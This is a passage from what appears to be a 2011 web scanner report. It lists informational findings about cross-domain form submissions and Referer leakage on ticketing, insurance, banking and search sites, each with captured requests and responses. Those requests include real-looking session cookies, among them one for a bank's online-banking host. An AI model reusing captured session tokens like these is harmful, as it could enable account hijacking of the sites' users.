Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.4.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.5. http://www.frontrowusa.com/Sell-Tickets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Sell-Tickets

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /Sell-Tickets HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.2.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.6. http://www.frontrowusa.com/Sports_Tickets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Sports_Tickets

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /Sports_Tickets HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
Referer: http://www.frontrowusa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.1.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.7. https://www.frontrowusa.com/Cart  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /Cart

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /Cart HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.2.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.8. https://www.frontrowusa.com/Cart/Address  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /Cart/Address

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /Cart/Address HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
Referer: http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.7.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:27:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.9. https://www.frontrowusa.com/members/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /members/login

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /members/login HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.2.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.10. http://www.mycigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycigna.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain my.cigna.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.mycigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 16 May 2011 15:29:47 GMT
last-modified: Sun, 15 May 2011 10:00:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.0.0.3 (Build 060807)
Content-Length: 297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE></TITLE>
</HEAD>
<body onLoad="document.webseal.submit();">
       <form name="webseal" method="post" action="https://my.cigna.com/web/public/guest" ></form>
...[SNIP]...
12. Cross-domain Referer leakage  previous  next
There are 10 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

12.1. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Mon, 16 May 2011 14:37:39 GMT
Cache-Control: private,max-age=300
Date: Mon, 16 May 2011 14:32:39 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 121626

<html><head><script>(function(){var a=window;function b(g){this.t={};this.tick=function(h,i,c){c=c!=undefined?c:(new Date).getTime();this.t[h]=[c,i]};this.tick("start",null,g)}var d=new b;a.jstiming={
...[SNIP]...
<div id="paging_controls" style="overflow: hidden; padding: 2px 0px 4px 6px;">
<a href="http://fcgadgets.blogspot.com/" target="_blank">Get more gadgets for your site</a>
...[SNIP]...
12.2. http://phx.corporate-ir.net/phoenix.zhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phx.corporate-ir.net
Path:   /phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /phoenix.zhtml?c=65036&p=irol-irhome HTTP/1.1
Host: phx.corporate-ir.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/IR_investorrelations.html

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21117
Cache-Control: private, max-age=57
Date: Mon, 16 May 2011 15:52:29 GMT
Connection: close

<html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD41LzE2LzIwMTEgMTE6NTI6MjkgQU08L3RpbWVTdGFtcD48dGltZVRpbGxDQ0JOUmVmcmVzaD42MDwvdGltZVRpbGxDQ0JOUmVmcmVzaD48L3BoeHBhZ2U+###--><head><link href="client/65/65036/css
...[SNIP]...
<div id="mcHeaderImage"><img src="http://www.regions.com/virtualmedia/img286.jpg" /></div>
...[SNIP]...
<td width="106"><a href="http://thomson.mobular.net/thomson/7/3185/4450/" target="-blank"><img src="http://media.corporate-ir.net/media_files/IROL/65/65036/2010_Regions_AR.jpg" style="border: 1px solid #000000;" />
...[SNIP]...
<br /><a href="http://thomson.mobular.net/thomson/7/3185/4450/" target="_blank">Interactive Annual Report</a>
...[SNIP]...
<span class="ccbnDisclaimer">Quotes delayed at least 15 minutes. Market data provided by <a href="http://www.interactivedata.com/" target="_blank">Interactive Data</a>
...[SNIP]...
<br><a href="http://www.interactivedata.com/index.php/Contents/show/content/quoteTerms" target="_blank">Terms & Conditions</a>. Powered and implemented by <a href="http://www.interactivedata.com/idms/" target="_blank">Interactive Data Managed Solutions</a>
...[SNIP]...
<img src="http://media.corporate-ir.net/media_files/irol/65/65036/images/logoEqualHousingLender.gif" width="15" height="13" border="0" /><a class="fCLink" href="http://www.regions.com/personal_banking/ehl.rf" title="'" equal="" housing="" target="_parent"> Equal Housing Lender</a>
...[SNIP]...
12.3. https://securebank.regions.com/SystemUnavailable.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /SystemUnavailable.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /SystemUnavailable.aspx?ResultCode=VALIDATIONERROR HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: securebank.regions.com-https=R890651000; ASP.NET_SessionId=rxyjhw55ndvthz45fybes045

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 4559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
   <HEAD>
       <title>Regions Online Banking</title>
       <link href="https://secureb
...[SNIP]...
<noscript>
                <img alt='' border='0' name='DCSIMG' width='1' height='1' src='https://statse.webtrendslive.com/dcs4b71fc10000gs8u88h5t1k_6n2i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.0.2'>
                </noscript>
...[SNIP]...
12.4. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=flyerboard+code HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=Lhm6ttn7an2-iBnzwND2ChEHpa2gcQrA0oxhn4qPKMBja0y3M9EooPWTFGVZE1WGhC0EeQbdhjodIci27iUTt4FJdl_w1CKKGajsRgpNHjVx0TFdmc2yQbpHgH6J9Zjt

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 80284

<!doctype html> <head> <title>flyerboard code - Google Search</title> <script>window.google={kEI:"ezjRTeaPFsro0QGFndz8DQ",kEXPI:"17259,23756,24692,24878,24879,25907,27400,28505,29229,29685,2979
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=flyerboard+code&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/publishers/flyerboard.php" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">PaperG | Publishers : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0Lob55IZ_i4J:www.paperg.com/publishers/flyerboard.php+flyerboard+code&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html" class=l onmousedown="return clk(this.href,'','','','2','','0CB0QFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:e8B1yZAjkTMJ:www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html+flyerboard+code&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html" class=l onmousedown="return clk(this.href,'','','','3','','0CCMQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lpWn_tbiTO8J:www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html+flyerboard+code&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCgQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html" class=l onmousedown="return clk(this.href,'','','','4','','0CCkQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:e5qQFT3uJV8J:www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html+flyerboard+code&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CC4QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.freelancer.com/projects/arc-tag/flyerboard-code-website.html" class=l onmousedown="return clk(this.href,'','','','5','','0CDAQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:u5RLdXA_bvEJ:www.freelancer.com/projects/arc-tag/flyerboard-code-website.html+flyerboard+code&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDUQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://techcrunch.com/tag/flyerboard/" class=l onmousedown="return clk(this.href,'','','','6','','0CDYQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sMpj_0dgfj8J:techcrunch.com/tag/flyerboard/+flyerboard+code&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CDsQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://techcrunch.com/2010/08/23/papergs-flyerboard-latimes-media-loca/" class=l onmousedown="return clk(this.href,'','','','7','','0CDwQFjAG')">PaperG&#39;s <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:pypaho5spwwJ:techcrunch.com/2010/08/23/papergs-flyerboard-latimes-media-loca/+flyerboard+code&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://outsidetheclassroom.pitt.edu/Community?action=getEventsView" class=l onmousedown="return clk(this.href,'','','','8','','0CEQQFjAH')">Events - OCC - Outside the Classroom Curriculum - Powered by <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dTOYiFwn4rkJ:outsidetheclassroom.pitt.edu/Community%3Faction%3DgetEventsView+flyerboard+code&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:dTOYiFwn4rkJ:outsidetheclassroom.pitt.edu/Community%3Faction%3DgetEventsView+flyerboard+code&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com','','','','8','','0CEkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.freelancer.ph/projects/arc-tag/flyerboard-code-website.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sID4FeA4FnwJ:www.freelancer.ph/projects/arc-tag/flyerboard-code-website.html+flyerboard+code&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="https://myinvolvement.indiana.edu/" class=l onmousedown="return clk(this.href,'','','','10','','0CFEQFjAJ')">myINvolvement - Powered by CollegiateLink</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XP7vCgYgIN0J:https://myinvolvement.indiana.edu/+flyerboard+code&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFYQIDAJ')">Cached</a>
...[SNIP]...
12.5. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=paperg&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=KItN1BTtwQNNlX1ALe1vDC7hoepoKX2UQICiquxtJyGvPpXkRhOP0VSYRncKH-Ip7WUjGpM92yvv3kjAfNGRUaBZTHmZpQy4UvWTLU1BWRwGdARXc--dGj_5qPLGEDEK

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:24:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 69931

<!doctype html> <head> <title>paperg - Google Search</title> <script>window.google={kEI:"oE_RTdn5OYj50gGB5eznDQ",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,29822,3
...[SNIP]...
